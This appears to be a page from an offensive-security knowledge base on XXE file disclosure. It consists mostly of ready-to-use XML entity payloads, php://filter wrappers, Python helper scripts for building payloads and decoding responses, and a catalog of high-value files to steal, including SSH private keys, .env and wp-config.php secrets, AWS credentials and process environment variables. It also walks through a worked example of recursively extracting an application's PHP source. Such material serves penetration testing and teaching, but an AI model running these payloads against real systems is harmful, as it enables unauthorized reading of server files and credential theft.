File Disclosure

Once you’ve confirmed external entity resolution works (see Identifying), file disclosure is template substitution: swap the entity’s system identifier for the file you want. There are three paths, depending on the target and on what the file contains:

# Path 1 - file:// for plain-text files
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><name>&xxe;</name></root>
# Path 2 - php://filter/ for files that contain XML-breaking characters
# (source code with <, >, &) or binary content
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">
]>
<root><name>&xxe;</name></root>
# → response contains base64; decode with `echo '...' | base64 -d`
# Path 3 - Java directory listing
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/">]>
<root><name>&xxe;</name></root>
# → directory contents (Java parsers only)

Success indicator: response body contains the file’s contents (or its base64 encoding) where the entity was referenced.
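
The substitution can be scripted in a few lines. This is a minimal sketch, not a finished tool: `build_payload` is a hypothetical helper name, and the `root`/`name` elements are taken from the examples above and must be changed to whatever the target endpoint actually reflects.

```python
PAYLOAD_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "{system_id}">
]>
<root><name>&xxe;</name></root>"""


def build_payload(system_id: str) -> str:
    """Return an XXE document whose entity points at `system_id`.

    The system literal is delimited by double quotes and has no escape
    mechanism, so a double quote inside it cannot be represented.
    """
    if '"' in system_id:
        raise ValueError("system identifier must not contain a double quote")
    return PAYLOAD_TEMPLATE.format(system_id=system_id)


if __name__ == "__main__":
    print(build_payload("file:///etc/passwd"))
    print(build_payload(
        "php://filter/convert.base64-encode/resource=/var/www/html/index.php"
    ))
```

Only the system identifier changes between the three paths; the rest of the document stays fixed.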

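XML has reserved characters: <, >, &, ", '. When an external entity is expanded into XML content, the parser treats the file's text as markup, so a raw < or & breaks the parse (>, ", and ' are normally tolerated inside element content). The parser either: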

  • Errors out (no useful output)
  • Silently truncates at the first reserved character
  • Successfully renders the file because the file contains no reserved characters

/etc/passwd, /etc/hostname, log files, plain-text configs - these typically work with raw file:// because they’re plain text with no < or &. Source code, HTML, XML, config files with embedded shell, and any binary content - these break unless wrapped.
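
To check offline whether a given file is likely to survive a raw file:// read, you can approximate the expansion by pasting sample content into an element and parsing it. This is a rough sketch using Python's standard parser, not the target's parser, so treat the result as a hint; `survives_inline` is a hypothetical helper name.

```python
import xml.etree.ElementTree as ET


def survives_inline(content: str) -> bool:
    """Return True if `content` parses as character data inside an element.

    This mimics what happens when an entity's replacement text is parsed
    as part of the document body.
    """
    document = f"<root><name>{content}</name></root>"
    try:
        ET.fromstring(document)
    except ET.ParseError:
        return False
    return True


if __name__ == "__main__":
    samples = {
        "passwd line": "root:x:0:0:root:/root:/bin/bash",
        "PHP comparison": "if ($a < $b) {",
        "shell and-chain": "make && make install",
        "greater-than and quotes": "x > y and 'quoted' \"text\"",
    }
    for label, text in samples.items():
        print(f"{label}: {'ok' if survives_inline(text) else 'breaks'}")
```

Anything reported as breaking here is a candidate for Path 2 or the CDATA approach.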

The wrapper of choice for PHP targets is php://filter/convert.base64-encode/ because base64 output is XML-safe by definition (alphanumeric + +, /, = - none are reserved). For non-PHP targets, the CDATA approach in Blind exfil is the alternative.

The textbook payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<name>&xxe;</name>
<email>[email protected]</email>
</root>

Response contains the file:

<message>Thanks root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...</message>

The URL is written file:/// with three slashes - file: is the scheme, // introduces the (empty) host, and the third / is the root of the absolute path. Some parsers tolerate file:/etc/passwd (one slash) but the three-slash form is portable.

On Windows targets:

<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
<!ENTITY xxe SYSTEM "file:///c:/boot.ini">
<!ENTITY xxe SYSTEM "file:///c:/inetpub/wwwroot/web.config">

Forward slashes work on Windows in file:// URIs. Backslashes work in some parsers but break in others; default to forward slashes.
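
A small normalizer keeps the Linux and Windows forms consistent. This is a sketch under the conventions described above (three slashes, forward slashes only); `file_uri` is a hypothetical helper name and it deliberately does no percent-encoding.

```python
def file_uri(path: str) -> str:
    """Build a three-slash file:// URI from a Linux or Windows path.

    Backslashes are converted to forward slashes, and drive-letter paths
    such as c:/windows/win.ini get the leading slash they need.
    """
    normalized = path.replace("\\", "/")
    if not normalized.startswith("/"):
        normalized = "/" + normalized
    return "file://" + normalized


if __name__ == "__main__":
    print(file_uri("/etc/passwd"))
    print(file_uri("c:\\windows\\win.ini"))
    print(file_uri("c:/inetpub/wwwroot/web.config"))
```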

If /etc/hostname returns fully but /etc/passwd returns only the first line, the parser is choking on something in the file. A quick diagnostic:

# Check what the file actually contains at the suspected break point
$ curl http://target/.../?file_disclosure | head -c 200
# If it stops at a < or & character, that's the break

If the file has reserved characters, switch to Path 2.

Path 2 - php://filter wrapper for PHP targets


For PHP-backed apps, the php://filter/ wrapper lets the entity resolver apply a transformation before returning the content:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">
]>
<root>
<name>&xxe;</name>
</root>

Response contains base64:

PD9waHAKaW5jbHVkZSBfX0RJUl9fIC4gJy9jb25maWcucGhwJzsKLi4u

Decode:

$ echo 'PD9waHAKaW5jbHVkZSBfX0RJUl9fIC4gJy9jb25maWcucGhwJzsKLi4u' | base64 -d
<?php
include __DIR__ . '/config.php';
...

The wrapper URI has this shape:

php://filter/<filter-chain>/resource=<file-path>

Filter chain is convert.base64-encode for source-code extraction. Other useful filters:

| Filter | Effect | Use case |
| --- | --- | --- |
| `convert.base64-encode` | Base64 the output | Anything with <, >, &, or binary content |
| `convert.iconv.UTF-8.UTF-16` | Re-encode UTF-8 to UTF-16 | Sometimes survives where base64 doesn’t (rare) |
| `zlib.deflate \| convert.base64-encode` | Compress then base64 | Large files (chain with `\|`) |
| `string.rot13` | ROT-13 | Curiosity; not generally useful |

Always start with convert.base64-encode - it’s the universal solution.
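
Building the wrapper URI and undoing a compressed chain can be sketched as follows. Two assumptions to flag: the helper names `filter_uri` and `decode_deflated` are hypothetical, and the decoder assumes PHP's zlib.deflate filter emits a raw deflate stream with no zlib header (hence the negative window size). If decoding fails against a real target, verify that assumption first.

```python
import base64
import zlib


def filter_uri(filters, resource):
    """Join filter names with | and append the resource path."""
    return "php://filter/" + "|".join(filters) + "/resource=" + resource


def decode_deflated(b64_text):
    """Reverse a zlib.deflate|convert.base64-encode chain.

    Assumes a raw deflate stream, so wbits is -15 (no header, no checksum).
    """
    raw = base64.b64decode(b64_text)
    return zlib.decompress(raw, -15)


if __name__ == "__main__":
    print(filter_uri(["convert.base64-encode"], "/var/www/html/index.php"))
    print(filter_uri(["zlib.deflate", "convert.base64-encode"],
                     "/var/www/html/index.php"))
```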

The resource= value is the path the PHP wrapper opens. Try in order:

| Path | Used by |
| --- | --- |
| Relative: `resource=index.php` | When the working directory is the webroot - most common |
| Absolute Linux: `resource=/var/www/html/index.php` | When relative paths fail or you’ve identified the webroot from prior recon |
| Absolute Windows: `resource=c:/inetpub/wwwroot/index.php` | Windows targets |

Some parsers refuse relative paths in the wrapper. If you already know the webroot, go straight to the absolute path; if you don’t, try the relative form first.

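If you need an absolute path but don’t know the webroot, read a file that reveals it. Apache vhost configs contain <VirtualHost> blocks, so on PHP targets wrap them in php://filter if the raw read comes back empty: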

<!-- Often the simplest disclosure -->
<!ENTITY xxe SYSTEM "file:///etc/apache2/sites-enabled/000-default.conf">
<!-- Or nginx -->
<!ENTITY xxe SYSTEM "file:///etc/nginx/sites-enabled/default">
<!-- Or via /proc/self -->
<!ENTITY xxe SYSTEM "file:///proc/self/cwd/index.php">

/proc/self/cwd/ is a symlink to the process’s working directory; reading cwd/index.php reads the index.php of whatever the PHP-FPM worker has cwd’d to. Bypasses the “I don’t know where the webroot is” problem entirely on Linux.
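
Once a vhost config has been read, the webroot can be pulled out mechanically. This is a minimal sketch assuming the standard Apache `DocumentRoot` directive and nginx `root` directive; `find_webroots` is a hypothetical helper name and the regexes ignore includes, variables, and commented-out lines.

```python
import re

# Apache: DocumentRoot /var/www/html   (optionally quoted)
APACHE_DOCROOT = re.compile(
    r'^\s*DocumentRoot\s+"?([^"\s]+)"?', re.MULTILINE | re.IGNORECASE
)
# nginx: root /srv/www;
NGINX_ROOT = re.compile(r'^\s*root\s+([^;\s]+)\s*;', re.MULTILINE)


def find_webroots(config_text):
    """Return webroot paths named in an Apache or nginx config, in order."""
    roots = []
    for match in APACHE_DOCROOT.findall(config_text) + NGINX_ROOT.findall(config_text):
        if match not in roots:
            roots.append(match)
    return roots


if __name__ == "__main__":
    apache = "<VirtualHost *:80>\n    DocumentRoot /var/www/html\n</VirtualHost>\n"
    nginx = "server {\n    root /srv/www;\n    index index.php;\n}\n"
    print(find_webroots(apache))
    print(find_webroots(nginx))
```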

Java’s XML parsers historically allowed pointing entities at directories, returning a directory listing rather than a file’s contents:

<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/">
]>
<root><name>&xxe;</name></root>

Response:

adduser.conf
alternatives/
apache2/
apt/
bash.bashrc
...

Useful when you don’t know what files exist on the system. Listing /, /etc/, /home/, and /var/www/ quickly maps interesting targets.

This only works on Java parsers (and some older non-PHP parsers). PHP returns an error or an empty expansion when handed a directory. If you’re not sure which stack you’re facing, see Identifying for how to detect the framework.

The catalog, organized by what you’re trying to accomplish:

| File | Contents |
| --- | --- |
| `/etc/passwd` | Users (UIDs, home dirs, shells) |
| `/etc/shadow` | Password hashes (root-only; usually inaccessible) |
| `/etc/hostname` | Server hostname |
| `/etc/hosts` | Local DNS overrides |
| `/etc/resolv.conf` | DNS server config |
| `/etc/os-release` | Linux distribution |
| `/etc/issue` | Login banner - often shows distro |
| `/proc/version` | Kernel version |
| `/proc/self/environ` | Process environment variables - sometimes leaks credentials |
| `/proc/self/cmdline` | Process command line |
| `/proc/self/cwd/` | Symlink to current working directory |
| `/proc/self/fd/0`, `/proc/self/fd/1` | File descriptors (sometimes useful for log access) |

| File | Contents |
| --- | --- |
| `/etc/apache2/apache2.conf` | Apache main config |
| `/etc/apache2/sites-enabled/000-default.conf` | Apache vhost config (reveals webroot) |
| `/etc/nginx/nginx.conf` | Nginx main config |
| `/etc/nginx/sites-enabled/default` | Nginx vhost config |
| `/etc/php/<version>/apache2/php.ini` | PHP config (reveals enabled modules, including expect) |
| `/usr/local/etc/php/php.ini` | Alternative PHP config path |

| File | Likely path or contents |
| --- | --- |
| `index.php` | `/var/www/html/index.php`, `/srv/www/index.php`, `/app/index.php` |
| `config.php`, `db.php`, `.env` | Database credentials, API keys |
| `wp-config.php` (WordPress) | `/var/www/html/wp-config.php` - DB creds, secret keys |
| `application.properties` (Spring) | `/opt/app/application.properties` - DB creds |
| `appsettings.json` (.NET Core) | `/var/www/app/appsettings.json` |
| `settings.py` (Django) | `/srv/django/myapp/settings.py` - SECRET_KEY, DB |
| `manage.py` (Django) | Reveals project name |

| File | Contents |
| --- | --- |
| `/home/<user>/.ssh/id_rsa` | SSH private key - direct lateral movement |
| `/home/<user>/.ssh/authorized_keys` | Confirms an account, lists trusted keys |
| `/root/.ssh/id_rsa` | Root SSH key (usually root-only) |
| `/home/<user>/.bash_history` | Command history - sometimes contains passwords typed inline |
| `/home/<user>/.aws/credentials` | AWS access keys |
| `/home/<user>/.docker/config.json` | Docker registry credentials |
| `/var/lib/mysql/mysql.sock` | MySQL socket - confirms MySQL running |

| File | Contents |
| --- | --- |
| `c:/windows/win.ini` | Tiny baseline file; proves Windows + file read |
| `c:/windows/system.ini` | System config |
| `c:/boot.ini` | Boot config (legacy) |
| `c:/windows/system32/drivers/etc/hosts` | Windows hosts file |
| `c:/inetpub/wwwroot/web.config` | IIS app config - DB connection strings, machine keys |
| `c:/inetpub/logs/LogFiles/` | IIS logs (Java-style directory listing) |
| `c:/Users/<user>/.ssh/id_rsa` | SSH key if installed |
| `c:/Windows/System32/config/SAM` | Password hashes (file is locked while Windows is running and needs SYSTEM-level access; usually blocked) |

| File | Contents |
| --- | --- |
| `/.dockerenv` | Presence proves you’re in a container |
| `/proc/self/cgroup` | Container ID and cgroup info |
| `/etc/hostname` | Container hostname (often randomized) |
| `/.docker/config.json` | Container registry credentials |
| Environment via `/proc/self/environ` | Often contains AWS creds, DB creds, app secrets |
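
/proc/self/environ is a run of NUL-separated KEY=value entries, which is a good reason to fetch it through the base64 wrapper where one is available. Once you have the decoded bytes, splitting them is straightforward. A minimal sketch: `parse_environ`, `likely_secrets`, and the keyword list are hypothetical choices, not a standard.

```python
# Hypothetical keyword list; extend it for the stack you are looking at.
SECRET_HINTS = ("KEY", "SECRET", "TOKEN", "PASS")


def parse_environ(raw: bytes) -> dict:
    """Split the NUL-separated contents of /proc/self/environ into a dict."""
    env = {}
    for entry in raw.split(b"\0"):
        if b"=" not in entry:
            continue  # skips the empty entry after the trailing NUL
        key, _, value = entry.partition(b"=")
        env[key.decode("utf-8", "replace")] = value.decode("utf-8", "replace")
    return env


def likely_secrets(env: dict) -> dict:
    """Keep only variables whose names suggest credentials."""
    return {k: v for k, v in env.items()
            if any(hint in k.upper() for hint in SECRET_HINTS)}


if __name__ == "__main__":
    sample = b"PATH=/usr/bin\0DB_PASSWORD=example\0AWS_SECRET_ACCESS_KEY=example\0"
    print(likely_secrets(parse_environ(sample)))
```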

Suppose you have an XXE on a PHP contact form and want the app’s source.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///var/www/html/index.php">
]>
<root><name>&xxe;</name><email>x</email></root>

Response:

Thanks

The entity expanded to nothing. The < character in the <?php opening tag broke parsing. Switch to the php://filter wrapper.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">
]>
<root><name>&xxe;</name><email>x</email></root>

Response:

Thanks PD9waHAKc2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9TRVNTSU9OWyd1aWQnXSkpIHsKICAgIGhlYWRlcignTG9jYXRpb246IC9wcm9maWxlLnBocCcpOwogICAgZXhpdDsKfQouLi4=

Decode:

$ echo 'PD9waHAKc2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9TRVNTSU9OWyd1aWQnXSkpIHsKICAgIGhlYWRlcignTG9jYXRpb246IC9wcm9maWxlLnBocCcpOwogICAgZXhpdDsKfQouLi4=' | base64 -d
<?php
session_start();
if (isset($_SESSION['uid'])) {
    header('Location: /profile.php');
    exit;
}
...
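
When the base64 is embedded in surrounding text, as in the "Thanks ..." response above, extraction and decoding can be scripted. This is a sketch that assumes the longest base64-looking run in the body is the file; `decode_reflected` is a hypothetical helper name and the 16-character minimum is an arbitrary threshold to skip ordinary words.

```python
import base64
import re

# A run of base64 alphabet characters, optionally padded.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_reflected(response_body: str):
    """Decode the longest base64 run in a response, or return None."""
    runs = B64_RUN.findall(response_body)
    if not runs:
        return None
    longest = max(runs, key=len)
    return base64.b64decode(longest).decode("utf-8", "replace")


if __name__ == "__main__":
    body = "Thanks PD9waHAKaW5jbHVkZSBfX0RJUl9fIC4gJy9jb25maWcucGhwJzsKLi4u"
    print(decode_reflected(body))
```

For binary files, drop the final `.decode(...)` and write the bytes to disk instead.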

The source code is now in hand. Repeat for every PHP file referenced by index.php (include / require statements give you the paths to enumerate next).

Once you have one file, look for include, require, include_once, require_once statements. Each names another file:

include 'config.php';
require_once __DIR__ . '/db.php';
include('/var/www/html/lib/auth.php');

Loop: for each include/require, run the same XXE against the named file. After 3-5 iterations you’ve usually got the entire source tree.
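
The include-hunting step can be sketched with a regex. Assumptions to note: `find_includes` is a hypothetical helper, it only catches includes whose path is a single quoted string, and it resolves relative names against the including file's directory, which ignores PHP's include_path and working-directory lookup.

```python
import posixpath
import re

# Keyword, then anything up to the first quote (e.g. "__DIR__ . "), then the path.
INCLUDE_RE = re.compile(
    r"\b(?:include|require)(?:_once)?\b([^;'\"]*)['\"]([^'\"]+)['\"]"
)


def find_includes(php_source: str, current_file: str):
    """Return absolute paths of files included by `php_source`."""
    base = posixpath.dirname(current_file)
    found = []
    for prefix, target in INCLUDE_RE.findall(php_source):
        if "__DIR__" in prefix:
            # __DIR__ . '/db.php' is relative to the including file
            path = posixpath.join(base, target.lstrip("/"))
        elif target.startswith("/"):
            path = target
        else:
            path = posixpath.join(base, target)
        path = posixpath.normpath(path)
        if path not in found:
            found.append(path)
    return found


if __name__ == "__main__":
    source = (
        "include 'config.php';\n"
        "require_once __DIR__ . '/db.php';\n"
        "include('/var/www/html/lib/auth.php');\n"
    )
    for path in find_includes(source, "/var/www/html/index.php"):
        print(path)
```

Feed each returned path back into the wrapper payload and repeat until no new files appear.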

For automation, see Automation - XXEinjector can mass-extract.

Some parsers cap entity content at a fixed size (libxml has a default limit of about 10MB). Large log files or binaries may come back partial. Workarounds:

  • On PHP targets, compress before encoding: zlib.deflate|convert.base64-encode shrinks compressible files such as logs
  • A transform such as php://filter/read=string.toupper/resource=... changes the content, not its size, so it doesn’t help; reading by offset means chaining multiple entities, which is complex - it is usually easier to find a smaller file

Reading /etc/shadow typically fails because the PHP-FPM user isn’t root. The error response varies:

  • Empty content (parser silently failed)
  • HTTP 500 with stack trace
  • Original response with empty entity expansion

/etc/shadow is essentially never readable via XXE on a well-configured system. Move on to /home/<user>/.ssh/id_rsa for the same kind of payoff.
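
If you already have /etc/passwd, it tells you which home directories are worth trying. A minimal sketch: `ssh_key_candidates` is a hypothetical helper, the sample user `alice` is made up, and filtering on `nologin`/`false` shells is a heuristic rather than a rule.

```python
def ssh_key_candidates(passwd_text: str):
    """Return file:// URIs for id_rsa under each login-capable home directory."""
    candidates = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # not a well-formed passwd entry
        home, shell = fields[5], fields[6]
        if shell.endswith(("nologin", "false")):
            continue  # service accounts rarely have keys
        candidates.append(f"file://{home}/.ssh/id_rsa")
    return candidates


if __name__ == "__main__":
    passwd = (
        "root:x:0:0:root:/root:/bin/bash\n"
        "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
        "alice:x:1000:1000::/home/alice:/bin/bash\n"
    )
    for uri in ssh_key_candidates(passwd):
        print(uri)
```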

<!ENTITY xxe SYSTEM "file:///path/with spaces/file.txt">

If the literal form above fails, URL-encode the spaces:

<!ENTITY xxe SYSTEM "file:///path/with%20spaces/file.txt">

Either may work depending on parser. Try unencoded first; URL-encode if it fails.
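
Generating both forms in the order suggested above is a one-liner with the standard library. A sketch only: `system_id_variants` is a hypothetical helper name, and it expects an absolute path that begins with a slash.

```python
from urllib.parse import quote


def system_id_variants(path: str) -> list:
    """Return the literal file:// URI, plus a percent-encoded one if it differs."""
    literal = "file://" + path
    encoded = "file://" + quote(path, safe="/:")
    return [literal] if literal == encoded else [literal, encoded]


if __name__ == "__main__":
    for uri in system_id_variants("/path/with spaces/file.txt"):
        print(uri)
```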

The response is gibberish even though the file should be plain text. Possibilities:

  • File is UTF-16 or another encoding; specify in the XML declaration <?xml version="1.0" encoding="UTF-16"?> - rarely needed for Linux text files
  • Parser is wrapping the output in unexpected encoding; try convert.base64-encode and decode manually

| Task | Payload |
| --- | --- |
| Plain text file | `<!ENTITY xxe SYSTEM "file:///etc/passwd">` |
| PHP source code | `<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">` |
| Windows file | `<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">` |
| Java directory listing | `<!ENTITY xxe SYSTEM "file:///etc/">` |
| Find current webroot | `<!ENTITY xxe SYSTEM "file:///proc/self/cwd/index.php">` (Linux only) |
| Read SSH key | `<!ENTITY xxe SYSTEM "file:///home/USERNAME/.ssh/id_rsa">` |
| Read process environment | `<!ENTITY xxe SYSTEM "file:///proc/self/environ">` |
| Read Apache vhost | `<!ENTITY xxe SYSTEM "file:///etc/apache2/sites-enabled/000-default.conf">` |
| Read .env (Laravel, generic) | `<!ENTITY xxe SYSTEM "file:///var/www/html/.env">` |
| Decode base64 response | `echo 'BASE64' \| base64 -d` |
| If content truncates at `<` | Switch to `php://filter/convert.base64-encode/` |
| If non-PHP target | See Blind exfil for CDATA wrap |
| If no reflection | See Blind exfil for OOB exfil |
| Recursive source extraction | Find include/require in extracted source; loop on named files |

For attacks beyond file read (SSRF, RCE via expect, DoS), see RCE and SSRF. For the blind variants when no response reflection is available, see Blind exfil.

Defenses D3-IAA